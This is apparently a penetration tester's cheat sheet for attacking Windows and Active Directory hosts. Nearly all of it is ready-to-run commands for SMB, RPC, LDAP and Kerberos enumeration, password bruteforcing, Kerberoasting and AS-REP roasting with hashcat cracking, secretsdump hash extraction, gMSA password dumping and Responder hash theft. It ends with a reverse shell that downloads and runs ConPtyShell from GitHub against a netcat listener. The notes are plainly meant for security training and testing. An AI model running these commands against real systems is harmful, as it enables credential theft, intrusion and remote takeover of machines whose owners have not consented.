Windows

---

• DMP File

• Enum4Linux

• Enumeration

• Exfiltration

• IMPACKET

• Kerberos

• Ldap

• MSRPC

• Responder

• Reverse shell

• SMB

• Virus

• WinRM

Enumeration

Scripts

Winpeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -O

PrivescCheck

This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Github

Enum4Linux

Enum4linux is a tool for enumerating information from Windows and Samba systems.

List Users

enum4linux -U ip

Blank user

enum4linux -a -u '' -p '' ip

With User

enum4linux -a -u user -p password ip

SMB

Port: 445

SMB/Samba is a popular freeware program that allows users to access and use files, printers, and other commonly shared resources.

Nmap

nmap -p 445 --script smb-os-discovery ip

List Share

smbclient -L ip -U user

smbclient -L ip --no-pass

Connect

smbclient '//ip/SHARE' --no-pass

smbclient '//ip/SHARE' -U user%password

SmbMap

smbmap -H ip -u anonymous
smbmap -u user -p pass -H ip

Bruteforce

crackmapexec smb ip -u users.txt -p password.txt

Bruteforce users

crackmapexec smb -u 'user' -p 'pass' ip --rid-brute 

MSRPC

Port: 135

"MSRPC is a protocol that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer's network." · Hacktricks

Connect

rpcclient ip -U user -L -h

rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumdomains
rpcclient $> getdompwinfo
rpcclient $> enumprivs

List Services

services.py user:password@987@ip list

rpcdump.py user:password@987@ip

IOXIDResolver is used for remote enumeration of network interfaces

python IOXIDResolver.py -t IP

Impacket Docs

WinRM

Port: 5985 / 5986

Windows Remote Management (WinRM) is a feature that allows administrators to remotely run management scripts, execute command, monitor and manage windows system remote computers and servers.

Connect with powershell

evil-winrm -i ip -u user -p password
evil-winrm -i ip -c certi.crt -k decrypted.key -p -u -S

Kerberos

Port: 88

Kerberos is an authentication protocol that is used to verify the identity of a user or host.

Bruteforce User

kerbrute userenum -d domain --dc ip user.txt

Get user ticket

Checking if Kerberos pre-authentication has been disabled for accounts

GetNPUsers.py -usersfile user.txt -no-pass -format hashcat -dc-ip ip DOMAIN/

Enumusers

With msfconsole we have able to list users form wordlists of users.

msf6 auxiliary(gather/kerberos_enumusers)

• Kerberos cheatsheet

Ldap

Port: 389, 636

Lightweight directory access protocol (LDAP) is a protocol that makes it possible for applications to query user information rapidly.

Nmap

nmap -n -sV --script "ldap* and not brute" -p 389 ip

Ldapsearch

ldapsearch -x -h IP -b DC=EXAMPLE,DC=COM

Ldapdomaindump

ldapdomaindump is a tool for gathering information of ldap. (you need to have creds of an user to use it)

ldapdomaindump IP -u 'DOMAIN\USER' -p PASSWORD --no-json --no-grep

gMSADumper

gMSADumper read the gMSA (group managed service accounts) password of the account.

python gMSADumper.py -u USER -p PASSWORD -d DOMAIN

IMPACKET

GetUserSPNs

GetUserSPNs find Service Principal Names that are associated with normal user account, and exfiltrate the kerberos.

python GetUserSPNs.py -dc-ip IP -outputfile KERBEROS_FILE_OUTPUT -request -debug <DOMAIN>/<USER>

hashcat -m 13100 --force -a 0 KERBEROS_FILE /usr/share/wordlists/rockyou.txt

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. Basicaly a rogue everything use for exemple to steal NLTLM Hash, usernames... source

Server (attacker) :

python Responder.py -I interface

Client (victim):

gci \\ip\test\test

GetNPUsers

GetNPUsers.py will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set.

python GetNPUsers.py -usersfile USER_LIST_FILE -no-pass -dc-ip IP DOMAIN/

secretsdump

secretsdump dumping Active Directory Password Hashes.

python secretsdump.py -just-dc-ntlm DOMAIN/USER@DOMAIN_CONTROLLER
python secretsdump.py DOMAIN/USER:PASSWORD@IP

Exfiltration

Certificate

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

Download file

Invoke-WebRequest -Uri http://example.com -OutFile file.out

DMP File

Extract

Foremost file.dmp

Volatility

vol -f memory.dmp scan_name | tee output_scan

Bulk Extractor

bulk_extractor -o bulk_output memory.dmp

Virus

Virus Total

Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community.

VirusTotal aggregates many antivirus products and online scan engines called Contributors

• VirusTotal Site

Cobalt Strike

• Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

• Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

• Cobalt Strike: Using Process Memory To Decrypt Traffic – Part 3

Reverse shell

ConPtyShell

ConPtyShell is a Fully Interactive Reverse Shell for Windows systems. source

Server :

stty raw -echo; (stty size; cat) | nc -lvnp port

Client with internet access:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell ip port

without create shell.ps1, paste the Invoke-ConPtyShell.ps1, add Invoke-ConPtyShell ip port on a new line

Interactive Windows cheatsheet : Wadcoms